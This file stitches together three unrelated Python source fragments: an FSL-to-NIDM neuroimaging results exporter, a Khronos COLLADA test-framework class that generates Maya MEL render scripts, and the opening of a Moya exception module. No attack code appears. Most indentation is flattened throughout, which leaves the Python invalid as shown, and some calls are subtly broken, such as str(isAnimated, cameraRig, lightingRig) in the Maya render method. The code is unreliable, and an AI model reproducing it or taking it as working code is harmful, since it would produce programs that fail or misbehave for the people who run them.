FSL_GAUSSIAN_RUNNING_LINE_DRIFT_MODEL, cut_off)
else:
design_type = None
hrf_model = None
drift_model = None
real_ev = list()
for ev_num, ev_name in orig_ev.items():
real_ev.append(ev_name)
# Add one regressor name if there is an extra column for a temporal
# derivative
tempo_deriv_re = \
r'.*set fmri\(deriv_yn'+str(ev_num)+'\) (?P<info>[\d]+).*'
tempo_deriv = bool(self._search_in_fsf(tempo_deriv_re))
if tempo_deriv:
real_ev.append(ev_name+'*temporal_derivative')
# FIXME: other hrf models (FIR...)
design_matrix = DesignMatrix(design_mat_values, design_mat_image,
self.export_dir, real_ev, design_type,
hrf_model, drift_model)
return design_matrix
def _get_data(self):
"""
Parse FSL result directory to retrieve information about the data.
Return an object of type Data.
"""
grand_mean_scaling = True
target_intensity = 10000.0
data = Data(grand_mean_scaling, target_intensity)
return data
def _get_error_model(self):
"""
Parse FSL result directory to retrieve information about the error
model. Return an object of type ErrorModel.
"""
if self.first_level:
variance_homo = True
dependance = SERIALLY_CORR
variance_spatial = SPATIALLY_LOCAL
dependance_spatial = SPATIALLY_REGUL
else:
variance_homo = False
dependance = INDEPEDENT_CORR
variance_spatial = SPATIALLY_LOCAL
dependance_spatial = None
error_distribution = NIDM_GAUSSIAN_DISTRIBUTION
error_model = ErrorModel(
error_distribution, variance_homo,
variance_spatial, dependance, dependance_spatial)
return error_model
def _get_residual_mean_squares_map(self, stat_dir):
"""
Parse FSL result directory to retrieve information about the residual
mean squares map. Return an object of type ResidualMeanSquares.
"""
if self.first_level:
residuals_file = os.path.join(stat_dir, 'sigmasquareds.nii.gz')
else:
# FIXME cope num enter here
sigma2_group_file = os.path.join(stat_dir,
'mean_random_effects_var1.nii.gz')
sigma2_sub_file = os.path.join(stat_dir,
'varcope1.nii.gz')
# Create residual mean squares map
sigma2_group_img = nib.load(sigma2_group_file)
sigma2_group = sigma2_group_img.get_data()
sigma2_sub_img = nib.load(sigma2_sub_file)
sigma2_sub = sigma2_sub_img.get_data()
residuals_file = os.path.join(stat_dir,
'calculated_sigmasquareds.nii.gz')
residuals_img = nib.Nifti1Image(sigma2_group + sigma2_sub,
sigma2_sub_img.get_qform())
nib.save(residuals_img, residuals_file)
# In FSL all files will be in the same coordinate space
self.coord_space = CoordinateSpace(self._get_coordinate_system(),
residuals_file)
rms_map = ResidualMeanSquares(self.export_dir, residuals_file,
self.coord_space)
# FIXME: does not work
# if not self.first_level:
# Delete calculated rms file (a copy is now in the NIDM export)
# FIXME we need to add the wasDerivedFrom maps
# os.remove(residuals_file)
return rms_map
def _get_param_estimate_maps(self, stat_dir):
"""
Parse FSL result directory to retrieve information about the parameter
estimates. Return a list of objects of type ParameterEstimateMap.
"""
param_estimates = list()
for filename in os.listdir(stat_dir):
if filename.startswith("pe"):
if filename.endswith(".nii.gz"):
s = re.compile('pe\d+')
penum = s.search(filename)
penum = penum.group()
penum = penum.replace('pe', '')
full_path_file = os.path.join(stat_dir, filename)
param_estimate = ParameterEstimateMap(
full_path_file,
penum, self.coord_space)
param_estimates.append(param_estimate)
return param_estimates
def _get_mask_map(self, analysis_dir):
"""
Parse FSL result directory to retrieve information about the mask
created as part of Model Parameters Estimation. Return an object of
type MaskMap.
"""
mask_file = os.path.join(analysis_dir, 'mask.nii.gz')
mask_map = MaskMap(self.export_dir, mask_file,
self.coord_space, False)
return mask_map
def _get_grand_mean(self, mask_file, analysis_dir):
"""
Parse FSL result directory to retrieve information about the grand
mean map. Return an object of type GrandMeanMap.
"""
grand_mean_file = os.path.join(analysis_dir, 'mean_func.nii.gz')
# FIXME: Check if there is an alternative file to use here (maybe)
# depending on FSL version
if not os.path.isfile(grand_mean_file):
grand_mean = None
else:
grand_mean = GrandMeanMap(grand_mean_file, mask_file,
self.coord_space, self.export_dir)
return grand_mean
def _get_coordinate_system(self):
"""
Parse FSL result directory to retrieve information about the
coordinate system used in the current analysis (dependent on the
template).
"""
space_re = r'.*set fmri\(regstandard_yn\) (?P<info>[\d]+).*'
standard_space = bool(self._search_in_fsf(space_re))
if standard_space:
custom_re = \
r'.*set fmri\(alternateReference_yn\) (?P<info>[\d]+).*'
custom_space = self._search_in_fsf(custom_re, True)
if custom_space is not None:
    custom_standard = (custom_space == "1")
else:
custom_re = r'.*set fmri\(regstandard\) (?P<info>.+).*'
custom_space = self._search_in_fsf(custom_re)
if custom_space is not None:
custom_standard = True
else:
custom_standard = False
# TODO check if first level is always performed in subject space?
if not standard_space or self.first_level:
coordinate_system = NIDM_SUBJECT_COORDINATE_SYSTEM
else:
if not custom_standard:
coordinate_system = \
NIDM_ICBM_MNI152_NON_LINEAR6TH_GENERATION_COORDINATE_SYSTEM
else:
coordinate_system = NIDM_STANDARDIZED_COORDINATE_SYSTEM
return coordinate_system
def _search_in_fsf(self, regexp, return_not_found=False):
"""
Look for information matching regular expression 'regexp' in the design
file of the current study.
"""
info_search = re.compile(regexp)
info_found = info_search.search(self.design_txt)
if not info_found and return_not_found:
info = None
else:
info = info_found.group('info')
return info
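    # Hedged illustration: with a design.fsf line such as
    #   set fmri(level) 1
    # self._search_in_fsf(r'.*set fmri\(level\) (?P<info>\d+).*') returns "1".
    # With return_not_found=True a missing pattern yields None instead of
    # raising an AttributeError on the failed match.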
def _get_display_mask(self):
"""
Parse FSL result directory to retrieve information about the display mask.
"""
# FIXME this should be updated with actual contrast masking file
mask_file = os.path.join(self.feat_dir, 'mask.nii.gz')
return mask_file
def _get_num_peaks(self):
if self.feat_post_log is not None:
num_peak_search = re.compile(r'.* --num=(?P<numpeak>\d+)+ .*')
num_peak_found = num_peak_search.search(self.feat_post_log)
if num_peak_found:
num_peak = int(num_peak_found.group('numpeak'))
else:
num_peak_search = re.compile(r'.* -n=(?P<numpeak>\d+)+ .*')
num_peak_found = num_peak_search.search(self.feat_post_log)
if num_peak_found:
num_peak = int(num_peak_found.group('numpeak'))
else:
# If not specified, default value is inf?
# (cf. http://fsl.fmrib.ox.ac.uk/fsl/fslwiki/Cluster)
# Is it ok to say no limit with -1 (as for Inf
# we would need float...)
# FIXME: for now omitted if not explicitely defined
num_peak = None
else:
num_peak = None
return num_peak
def _get_peak_dist(self):
if self.feat_post_log is not None:
peak_dist_search = re.compile(
r'.* --peakdist=(?P<peakdist>\d+)+ .*')
peak_dist_found = peak_dist_search.search(self.feat_post_log)
if peak_dist_found:
peak_dist = float(peak_dist_found.group('peakdist'))
else:
# If not specified, default value is zero (cf.
# http://fsl.fmrib.ox.ac.uk/fsl/fslwiki/Cluster)
peak_dist = 0.0
else:
peak_dist = 0.0
return peak_dist
def _get_connectivity(self):
"""
Parse FSL result directory to retrieve peak connectivity within a
cluster.
"""
if self.feat_post_log is not None:
conn_re = r'.* --connectivity=(?P<connectivity>\d+)+ .*'
connectivity_search = re.compile(conn_re)
connectivity = int(
connectivity_search.search(
self.feat_post_log).group('connectivity'))
else:
connectivity = None
return connectivity
def _get_search_space(self, analysis_dir):
"""
Parse FSL result directory to retrieve information about the search
space. Return an object of type SearchSpace.
"""
# FIXME this needs to be estimated
search_space_file = os.path.join(analysis_dir, 'mask.nii.gz')
smoothness_file = os.path.join(analysis_dir, 'stats', 'smoothness')
# Load DLH, VOLUME, RESELS and noise FWHM
with open(smoothness_file, "r") as fp:
smoothness_txt = fp.read()
sm_reg = \
r"FWHMx = (?P<FWHMx_vx>\d+\.?\d*) voxels, " + \
r"FWHMy = (?P<FWHMy_vx>\d+\.?\d*) voxels, " + \
r"FWHMz = (?P<FWHMz_vx>\d+\.?\d*) voxels\n" + \
r"FWHMx = (?P<FWHMx_mm>\d+\.?\d*) mm, " + \
r"FWHMy = (?P<FWHMy_mm>\d+\.?\d*) mm, " + \
r"FWHMz = (?P<FWHMz_mm>\d+\.?\d*) mm\n" + \
r"DLH (?P<DLH>\d+\.?\d*) voxels\^\-3\n" + \
r"VOLUME (?P<volume>\d+) voxels\n" + \
r"RESELS (?P<vox_per_resels>\d+\.?\d*) voxels per resel"
sm_match = re.search(sm_reg, smoothness_txt, re.DOTALL)
if sm_match:
d = sm_match.groupdict()
else:
# smoothness was estimated without the "-V" option, recompute
log_file = os.path.join(self.feat_dir, 'logs', 'feat3_stats')
if not os.path.isfile(log_file):
log_file = os.path.join(self.feat_dir, 'logs', 'feat3_film')
if not os.path.isfile(log_file):
warnings.warn(
"Log file feat3_stats/feat3_film not found, " +
"noise FWHM will not be reported")
noise_fwhm_in_voxels = None
noise_fwhm_in_units = None
# Load DLH, VOLUME and RESELS
d = dict()
d['DLH'], d['volume'], d['vox_per_resels'] = \
np.loadtxt(smoothness_file, usecols=[1])
else:
with open(log_file, "r") as fp:
log_txt = fp.read()
cmd_match = re.search(r"(?P<cmd>smoothest.*)\n", log_txt)
cmd = cmd_match.group("cmd")
cmd = cmd.replace("stats/smoothness", "stats/smoothness_v")
cmd = cmd.replace("smoothest", "smoothest -V")
subprocess.call("cd "+analysis_dir+";"+cmd, shell=True)
with open(smoothness_file+"_v", "r") as fp:
smoothness_txt = fp.read()
sm_match = re.search(sm_reg, smoothness_txt, re.DOTALL)
d = sm_match.groupdict()
vol_in_units = float(d['volume'])*np.prod(
json.loads(self.coord_space.voxel_size))
vol_in_resels = float(d['volume'])/float(d['vox_per_resels'])
if 'FWHMx_vx' in d:
noise_fwhm_in_voxels = json.dumps(
[float(d['FWHMx_vx']), float(d['FWHMy_vx']),
float(d['FWHMz_vx'])])
noise_fwhm_in_units = json.dumps(
[float(d['FWHMx_mm']), float(d['FWHMy_mm']),
float(d['FWHMz_mm'])])
search_space = SearchSpace(
search_space_file=search_space_file,
vol_in_voxels=int(d['volume']),
vol_in_units=vol_in_units,
vol_in_resels=vol_in_resels,
resel_size_in_voxels=float(d['vox_per_resels']),
dlh=float(d['DLH']),
random_field_stationarity=True,
noise_fwhm_in_voxels=noise_fwhm_in_voxels,
noise_fwhm_in_units=noise_fwhm_in_units,
coord_space=self.coord_space,
export_dir=self.export_dir)
return search_space
def _get_clusters_peaks(self, stat_num):
"""
Parse FSL result directory to retrieve information about the clusters
and peaks declared significant for statistic 'stat_num'. Return a list
of Cluster objects.
"""
clusters = list()
for analysis_dir in self.analysis_dirs:
# Cluster list (positions in voxels)
cluster_file = os.path.join(analysis_dir,
'cluster_zstat' + stat_num + '.txt')
if not os.path.isfile(cluster_file):
cluster_file = None
else:
cluster_table = np.loadtxt(cluster_file, skiprows=1, ndmin=2)
# Cluster list (positions in mm)
cluster_std_file = os.path.join(
analysis_dir,
'cluster_zstat' + stat_num + '_std.txt')
if not os.path.isfile(cluster_std_file):
cluster_std_file = None
# cluster_std_table = np.zeros_like(cluster_table)*float('nan')
else:
cluster_std_table = np.loadtxt(cluster_std_file, skiprows=1,
ndmin=2)
# Peaks
peak_file = os.path.join(
analysis_dir, 'lmax_zstat' + stat_num + '.txt')
if not os.path.isfile(peak_file):
peak_file = None
else:
peak_table = np.loadtxt(peak_file, skiprows=1, ndmin=2)
peak_std_file = os.path.join(analysis_dir,
'lmax_zstat' + stat_num + '_std.txt')
if not os.path.isfile(peak_std_file):
peak_std_file = None
else:
peak_std_table = np.loadtxt(peak_std_file, skiprows=1, ndmin=2)
peaks = dict()
prev_cluster = -1
if (peak_file is not None) and (peak_std_file is not None):
peaks_join_table = np.column_stack(
(peak_table, peak_std_table))
for peak_row in peaks_join_table:
cluster_id = int(peak_row[0])
if not cluster_id == prev_cluster:
# First peak in this cluster
peakIndex = 1
# Though peak coordinates in voxels are integer, we use a
# float type to comply with the rdfs:range
peak = Peak(
peak_index=int(peakIndex), x=int(peak_row[2]),
y=int(peak_row[3]), z=int(peak_row[4]),
x_std=peak_row[7], y_std=peak_row[8],
z_std=peak_row[9],
equiv_z=float(peak_row[1]),
cluster_index=cluster_id, stat_num=stat_num)
if cluster_id in peaks:
peaks[cluster_id].append(peak)
else:
peaks[cluster_id] = list([peak])
prev_cluster = cluster_id
peakIndex = peakIndex + 1
elif (peak_file is not None):
for peak_row in peak_table:
cluster_id = int(peak_row[0])
if not cluster_id == prev_cluster:
peakIndex = 1
peak = Peak(
peak_index=int(peakIndex), x=int(peak_row[2]),
y=int(peak_row[3]), z=int(peak_row[4]),
equiv_z=float(peak_row[1]), cluster_index=cluster_id,
stat_num=stat_num)
if cluster_id in peaks:
peaks[cluster_id].append(peak)
else:
peaks[cluster_id] = list([peak])
prev_cluster = cluster_id
peakIndex = peakIndex + 1
elif (peak_std_file is not None):
for peak_row in peak_std_table:
cluster_id = int(peak_row[0])
if not cluster_id == prev_cluster:
peakIndex = 1
peak = Peak(
peak_index=int(peakIndex),
x_std=peak_row[2],
y_std=peak_row[3],
z_std=peak_row[4],
equiv_z=float(peak_row[1]), cluster_index=cluster_id,
stat_num=stat_num)
if cluster_id in peaks:
peaks[cluster_id].append(peak)
else:
peaks[cluster_id] = list([peak])
prev_cluster = cluster_id
peakIndex = peakIndex + 1
if (cluster_file is not None) and (cluster_std_file is not None):
clusters_join_table = np.column_stack((cluster_table,
cluster_std_table))
for cluster_row in clusters_join_table:
cluster_id = int(cluster_row[0])
size = int(cluster_row[1])
pFWER = float(cluster_row[2])
x = float(cluster_row[8])
y = float(cluster_row[9])
z = float(cluster_row[10])
x_std = float(cluster_row[24])
y_std = float(cluster_row[25])
z_std = float(cluster_row[26])
clusters.append(
Cluster(cluster_num=cluster_id, size=size,
pFWER=pFWER, peaks=peaks[
cluster_id], x=x, y=y, z=z,
x_std=x_std, y_std=y_std, z_std=z_std))
elif (cluster_file is not None):
for cluster_row in cluster_table:
cluster_id = int(cluster_row[0])
size = int(cluster_row[1])
pFWER = float(cluster_row[2])
x = float(cluster_row[8])
y = float(cluster_row[9])
z = float(cluster_row[10])
x_std = None
y_std = None
z_std = None
clusters.append(
Cluster(cluster_num=cluster_id, size=size,
pFWER=pFWER, peaks=peaks[
cluster_id], x=x, y=y, z=z,
x_std=x_std, y_std=y_std, z_std=z_std))
elif (cluster_std_file is not None):
for cluster_row in cluster_std_table:
cluster_id = int(cluster_row[0])
size = int(cluster_row[1])
pFWER = float(cluster_row[2])
x_std = float(cluster_row[8])
y_std = float(cluster_row[9])
z_std = float(cluster_row[10])
x = None
y = None
z = None
clusters.append(
Cluster(cluster_num=cluster_id, size=size,
pFWER=pFWER, peaks=peaks[
cluster_id], x=x, y=y, z=z,
x_std=x_std, y_std=y_std, z_std=z_std))
return clusters
|
|
# Copyright (c) 2012 The Khronos Group Inc.
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and /or associated documentation files (the "Materials "), to deal in the Materials without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Materials, and to permit persons to whom the Materials are furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Materials.
# THE MATERIALS ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE MATERIALS OR THE USE OR OTHER DEALINGS IN THE MATERIALS.
import os.path
import shutil
import Core.Common.FUtils as FUtils
from stat import *
from Core.Logic.FSettingEntry import *
from Scripts.FApplication import *
class FMaya_UIRender (FApplication):
"""The class which represents Maya 7.0 to the testing framework.
Note that this has only been tested on Maya 7.0 and will probably not work
on other versions.
"""
__PLUGIN = ("COLLADA")
__MEL_SCRIPT_EXTENSION = ".mel"
__SCRIPT_EXTENSION = ".py"
__IMPORT_OPTIONS = [
("Import document up-axis", "importUpAxis", "0"),
("Import document units", "importUnits", "0")]
__EXPORT_OPTIONS = [
("Bake transforms", "bakeTransforms", "0"),
("Relative paths", "relativePaths", "0"),
("Bake lighting", "bakeLighting", "0"),
("Export camera as lookat", "exportCameraAsLookat", "0"),
("Export polygons as triangles", "exportTriangles", "0"),
("Sampling", "isSampling", "0"),
("Curve-Contrain", "curveConstrainSampling", "0"),
("Sampling Function", "samplingFunction", ""),
("Static curve removal", "removeStaticCurves", "1"),
("Export polygon meshes", "exportPolygonMeshes", "1"),
("Export lights", "exportLights", "1"),
("Export cameras", "exportCameras", "1"),
("Export joints and skin", "exportJointsAndSkin", "1"),
("Export animations", "exportAnimations", "1"),
("Export invisible nodes", "exportInvisibleNodes", "0"),
("Export default cameras", "exportDefaultCameras", "0"),
("Export normals", "exportNormals", "1"),
("Export texture coordinates", "exportTexCoords", "1"),
("Export per-vertex colors", "exportVertexColors", "1"),
("Export per-vertex color animations", "exportVertexColorAnimations", "1"),
("Export geometric tangents", "exportTangents", "0"),
("Export texture tangents", "exportTexTangents", "1"),
("Export materials only", "exportMaterialsOnly", "0"),
("Export constraints", "exportConstraints", "1"),
("Export physics", "exportPhysics", "1"),
("Exclusion set mode", "exclusionSetMode", "0"),
("Exclusion set", "exclusionSets", ""),
("Export external references", "exportXRefs", "1"),
("De-Reference external references", "dereferenceXRefs", "0"),
("XFov", "cameraXFov", "0"),
("YFov", "cameraYFov", "1")]
__RENDER_CAMERA = "Camera"
__RENDER_RENDERER = "Renderer"
__RENDER_ANIMATION_START = "Animation Start Frame"
__RENDER_ANIMATION_END = "Animation End Frame"
__RENDER_ANIMATION_STEP = "Animation Step Interval"
__RENDER_STILL_START = "Non-Animation Start Frame"
__RENDER_STILL_END = "Non-Animation End Frame"
__RENDER_STILL_STEP = "Non-Animation Step Interval"
__RENDER_WIDTH = "X resolution"
__RENDER_HEIGHT = "Y resolution"
__RENDER_ARD = "Device Aspect Ratio (empty to ignore)"
__RENDER_FORMAT = "Output Filetype"
__RENDER_OPTIONS = [
(__RENDER_CAMERA, "- NOT USED -", "|testCamera"),
(__RENDER_WIDTH, "- NOT USED -", "512"),
(__RENDER_HEIGHT, "- NOT USED -", "512"),
(__RENDER_ANIMATION_START, "setAttr defaultRenderGlobals.startFrame ", "1"),
(__RENDER_ANIMATION_END, "setAttr defaultRenderGlobals.endFrame ", "45"),
(__RENDER_ANIMATION_STEP, "setAttr defaultRenderGlobals.byFrameStep ", "3"),
(__RENDER_STILL_START, "setAttr defaultRenderGlobals.startFrame ", "1"),
(__RENDER_STILL_END, "setAttr defaultRenderGlobals.endFrame ", "1"),
(__RENDER_STILL_STEP, "setAttr defaultRenderGlobals.byFrameStep ", "1")]
def __init__(self, configDict):
"""__init__() -> FMaya_UIRender"""
FApplication.__init__(self, configDict)
self.__melScript = None
self.__currentFilename = None
self.__currentImportProperName = None
self.__testImportCount = 0
self.__workingDir = None
def GetPrettyName(self):
"""GetPrettyName() -> str
Implements FApplication.GetPrettyName()
"""
return "Maya - UIRender"
def GetSettingsForOperation(self, operation):
"""GetSettingsForOperation(operation) -> list_of_FSettingEntry
Implements FApplication.GetSettingsForOperation()
"""
options = []
# Retrieve the list of options for this operation.
optionList = None
if operation == IMPORT: optionList = FMaya_UIRender.__IMPORT_OPTIONS
elif operation == EXPORT: optionList = FMaya_UIRender.__EXPORT_OPTIONS
elif operation == RENDER: optionList = FMaya_UIRender.__RENDER_OPTIONS
# Return a correctly-processed list of FSettingEntry's.
        if optionList is not None:
for entry in optionList:
options.append(FSettingEntry(*entry))
return options
def BeginScript(self, workingDir):
"""BeginScript(workingDir) -> None
Implements FApplication.BeginScript()
"""
melFilename = ("script" + str(self.applicationIndex) + FMaya_UIRender.__MEL_SCRIPT_EXTENSION)
self.__melScript = open(os.path.join(workingDir, melFilename) , "w")
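        # MEL preamble: load the COLLADA plug-in, start from an empty scene, and
        # define a fixNewlines() helper that rewrites the generated log files
        # with Windows-style line endings.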
self.__melScript.write(
"int $descriptor;\n" +
"catch(`loadPlugin \"" +
FMaya_UIRender.__PLUGIN.replace("\\", "\\\\") + "\"`);\n" +
"catch(`file -f -new`);\n\n" +
"proc fixNewlines(string $filename) {\n" +
" $tempFilename = $filename + \".temp\";\n" +
"\n" +
" $file=`fopen $filename \"r\"`;\n" +
" $tempFile=`fopen $tempFilename \"w\"`;\n" +
"\n" +
" string $nextLine = `fgetline $file`;\n" +
" while (size($nextLine) > 0) { \n" +
" fprint $tempFile `substitute \"\\n\" " +
"$nextLine \"\\r\\n\"`;\n" +
" $nextLine = `fgetline $file`;\n" +
" }\n" +
" fclose $tempFile;\n" +
" fclose $file;\n" +
"\n" +
" sysFile -delete $filename;\n" +
" sysFile -rename $filename $tempFilename;\n" +
"}\n\n")
self.__testImportCount = 0
self.__workingDir = workingDir
self.__renderFolders = []
def EndScript(self):
"""EndScript() -> None
Implements FApplication.EndScript()
"""
self.__melScript.close()
def RunScript(self):
"""RunScript() -> None
Implements FApplication.RunScript()
"""
if (not os.path.isfile(self.configDict["mayaPath"])):
print "Maya does not exist"
return True
command = ("\"" + self.configDict["mayaPath"] +
"\" -batch -script \"" + self.__melScript.name + "\"")
        # Quotes around the command are awkward, but this seems to be the only way that works.
print ("start running " + os.path.basename(self.__melScript.name))
returnValueImport = self.RunApplication(command, self.__workingDir)
if (returnValueImport == 0):
print "finished running " + os.path.basename(self.__melScript.name)
else:
print "crashed running " + os.path.basename(self.__melScript.name)
# Maya has a tendency to dump images where I don't want them to be.
# Look for images in the sub-folders of the output folder and move them to the output folder.
for renderFolder in self.__renderFolders:
subFolders = [renderFolder]
while (len(subFolders) > 0):
subFolder = subFolders[-1]
subFolders.pop()
for dirEntry in os.listdir(subFolder):
pathname = os.path.join(subFolder, dirEntry)
mode = os.stat(pathname)[ST_MODE]
if S_ISDIR(mode):
# Add this sub-folder to our queue.
subFolders.append(pathname)
elif S_ISREG(mode):
                        # Move any rendered PNG images back into the render output folder.
if FUtils.GetExtension(pathname).lower() == "png":
shutil.move(pathname, os.path.join(renderFolder, dirEntry))
self.__renderFolders = []
return (returnValueImport == 0)
def WriteImport(self, filename, logname, outputDir, settings, isAnimated, cameraRig, lightingRig):
"""WriteImport(filename, logname, outputDir, settings, isAnimated, cameraRig, lightingRig) -> list_of_str
Implements FApplication.WriteImport(). Assumes a COLLADA, maya binary,
or maya ascii file is being imported.
"""
baseName = FUtils.GetProperFilename(filename)
self.__currentImportProperName = baseName
output = (os.path.join(outputDir, baseName)).replace("\\", "/")
filename = filename.replace("\\", "/")
self.__currentFilename = output + ".mb"
# Generate the import options string.
options = ""
for setting in settings:
value = setting.GetValue().strip()
if len(value) == 0:
value = self.FindDefault(FMaya_UIRender.__IMPORT_OPTIONS, setting.GetPrettyName())
options = (options + setting.GetCommand() + "=" + value + ";")
# Generate the import MEL command.
extension = FUtils.GetExtension(filename).lower()
if (extension == "mb"):
command = ("catch(`file -type \"mayaBinary\" -o \"" + filename + "\"`);\n")
elif (extension == "ma"):
command = ("catch(`file -type \"mayaAscii\" -o \"" + filename + "\"`);\n")
else:
command = ("catch(`file -type \"COLLADA importer\" -op \"" + options + "\" -o \"" + filename + "\"`);\n")
self.__melScript.write(
"$logname = \"" + logname.replace("\\", "/") + "\";\n" +
"$descriptor = `cmdFileOutput -o $logname`;\n" +
"catch(`file -f -new`);\n" +
command +
"catch(`file -rename \"" + output + "\"`);\n" +
"catch(`file -save -type \"mayaBinary\"`);\n" +
"cmdFileOutput -c $descriptor;\n" +
"fixNewlines $logname;\n\n")
self.__testImportCount = self.__testImportCount + 1
return [os.path.normpath(baseName + ".mb"),]
def WriteRender(self, logname, outputDir, settings, isAnimated, cameraRig, lightingRig):
"""WriteRender(logname, outputDir, settings, isAnimated, cameraRig, lightingRig) -> list_of_str
Implements FApplication.WriteRender()
"""
baseName = self.__currentImportProperName
output = os.path.normpath(os.path.join(outputDir, baseName))
outputDir = os.path.dirname(output)
self.__melScript.write(
"$logname = \"" + logname.replace("\\", "/") + "\";\n" +
"$descriptor = `cmdFileOutput -o $logname`;\n")
# Unlock all setAttr attributes (for reimported older Maya files)
self.__melScript.write("setAttr -lock off defaultRenderGlobals.startFrame;\n")
self.__melScript.write("setAttr -lock off defaultRenderGlobals.endFrame;\n")
self.__melScript.write("setAttr -lock off defaultRenderGlobals.byFrameStep;\n")
self.__melScript.write("setAttr -lock off defaultRenderGlobals.imageFormat;\n")
self.__melScript.write("setAttr -lock off defaultRenderGlobals.imageFilePrefix;\n")
self.__melScript.write("setAttr -lock off defaultRenderGlobals.animation;\n")
self.__melScript.write("setAttr -lock off defaultRenderGlobals.putFrameBeforeExt;\n")
# Set render globals example:
# Maya node types: renderGlobals, hardwareRenderGlobals,
# setAttr hardwareRenderGlobals.frameBufferFormat 0
for setting in settings:
# Start by parsing the value.
value = setting.GetValue().strip()
if (len(value) == 0):
value = self.FindDefault(FMaya_UIRender.__RENDER_OPTIONS, setting.GetPrettyName())
prettyName = setting.GetPrettyName()
if (prettyName == FMaya_UIRender.__RENDER_ANIMATION_START):
if not isAnimated: continue
start = int(value)
elif (prettyName == FMaya_UIRender.__RENDER_ANIMATION_END):
if not isAnimated: continue
end = int(value)
elif (prettyName == FMaya_UIRender.__RENDER_ANIMATION_STEP):
if not isAnimated: continue
step = int(value)
elif (prettyName == FMaya_UIRender.__RENDER_STILL_START):
if isAnimated: continue
start = int(value)
elif (prettyName == FMaya_UIRender.__RENDER_STILL_END):
if isAnimated: continue
end = int(value)
elif (prettyName == FMaya_UIRender.__RENDER_STILL_STEP):
if isAnimated: continue
step = int(value)
# Record these settings for later.
elif (prettyName == FMaya_UIRender.__RENDER_WIDTH):
width = value
continue
elif (prettyName == FMaya_UIRender.__RENDER_HEIGHT):
height = value
continue
elif (prettyName == FMaya_UIRender.__RENDER_CAMERA):
camera = value
continue
self.__melScript.write(setting.GetCommand() + " " + value + ";\n")
self.__melScript.write("setAttr defaultRenderGlobals.imageFormat 32;\n") # where 32 is PNG.
self.__melScript.write("setAttr -type \"string\" defaultRenderGlobals.imageFilePrefix \"" + str(baseName) + "\";\n")
self.__melScript.write("setAttr defaultRenderGlobals.animation " + str(isAnimated, cameraRig, lightingRig).lower() + ";\n")
self.__melScript.write("setAttr defaultRenderGlobals.putFrameBeforeExt true;\n")
self.__melScript.write("workspace -renderType \"images\" \"" + outputDir.replace("\\", "/") + "\";\n")
self.__melScript.write("catch(`hwRender -camera \"" + camera + "\" -width " + width + " -height " + height + "`);\n\n")
self.__melScript.write("cmdFileOutput -c $descriptor;\nfixNewlines $logname;\n\n")
# Record this folder for image look-ups, because Maya spreads images in unexpected ways.
self.__renderFolders.append(outputDir)
outputList = []
if not isAnimated:
outputList.append(os.path.normpath(output + ".png"))
else:
numDigit = len(str(end))
for i in range(start, end + 1, step):
outputList.append(os.path.normpath(output + "." + str(i) + ".png"))
return outputList
def WriteExport(self, logname, outputDir, settings, isAnimated, cameraRig, lightingRig):
"""WriteImport(logname, outputDir, settings, isAnimated, cameraRig, lightingRig) -> list_of_str
Implements FApplication.WriteExport()
"""
basename = self.__currentImportProperName + ".dae"
output = os.path.join(outputDir, self.__currentImportProperName)
output = output.replace("\\", "/")
options = ""
for setting in settings:
value = setting.GetValue().strip()
if (value == ""):
value = self.FindDefault(FMaya_UIRender.__EXPORT_OPTIONS,
setting.GetPrettyName())
options = (options + setting.GetCommand() + "=" +
value + ";")
self.__melScript.write(
"$logname = \"" + logname.replace("\\", "/") + "\";\n" +
"$descriptor = `cmdFileOutput -o $logname`;\n" +
"catch(`file -op \"" + options +
"\" -typ \"COLLADA exporter\" -pr -ea \"" + output +
"\"`);\n" +
"cmdFileOutput -c $descriptor;\n" +
"fixNewlines $logname;\n\n")
return [os.path.normpath(basename),]
|
|
from __future__ import unicode_literals
from __future__ import print_function
from .compat import text_type, implements_to_string
from .tools import textual_list
class ArchiveError(Exception):
"""Error occurred with an archive operation"""
class LogicError(Exception):
hide_py_traceback = True
error_type = "Logic Error"
def __init__(self, original, trace):
self.original = original
self.moya_trace = trace
super(LogicError, self).__init__(trace.msg)
@property
def diagnosis(self):
return getattr(self.original, "diagnosis", None)
def get_moya_frames(self):
return self.moya_trace.stack
def __moyaconsole__(self, console):
self.moya_trace.__moyaconsole__(console)
def __unicode__(self):
return self.moya_trace.msg
def __repr__(self):
return "<LogicError {}>".format(self.moya_trace.msg)
class MoyaError(Exception):
"""Base exception for Moya related errors"""
# The message to use if no error is supplied
default_message = ""
# The message to user if an error is supplied
message = "{error}"
    @classmethod
    def _escape_format(cls, text):
return text.replace("{", "{{").replace("}", "}}")
def __init__(self, error=None, **kwargs):
fmt_args = kwargs
fmt_args["error"] = error
msg = self.format_error(error, fmt_args)
if "diagnosis" in kwargs:
self.diagnosis = kwargs["diagnosis"]
super(MoyaError, self).__init__(msg)
def format_error(self, error, fmt_args):
if fmt_args:
fmt_args = {
k: self._escape_format(text_type(v)) for k, v in fmt_args.items()
}
if error is None:
msg = self.default_message.format(**fmt_args)
else:
# print error, repr(fmt_args)
# error = self._escape_format(error)
fmt_args["error"] = error.format(**fmt_args)
msg = self.message.format(**fmt_args)
return msg
def __moyaconsole__(self, console):
console.text(text_type(self))
__moyaconsole__.is_default_error_message = True
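    # A hedged illustration of the template mechanism above: subclasses such as
    # UnknownAppError (further down) only override 'default_message', and
    # format_error() fills the named fields from the keyword arguments passed to
    # __init__, so UnknownAppError(app='blog') renders as
    # "No app in the project referenced by 'blog'".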
# def __unicode__(self):
# if self.fmt is None:
# return super(MoyaError, self).__unicode__()
# else:
# return self.fmt.format(**self.get_fmt_dict())
# def __str__(self):
# if self.fmt is None:
# return super(MoyaError, self).__str__()
# else:
# return self.fmt.format(**self.get_fmt_dict()).encode('ascii', 'replace')
class ParseError(MoyaError):
def __init__(self, message, path="?", position=None, code=None):
super(ParseError, self).__init__(message)
self.path = path
line, col = position
self.position = position
self.line = line
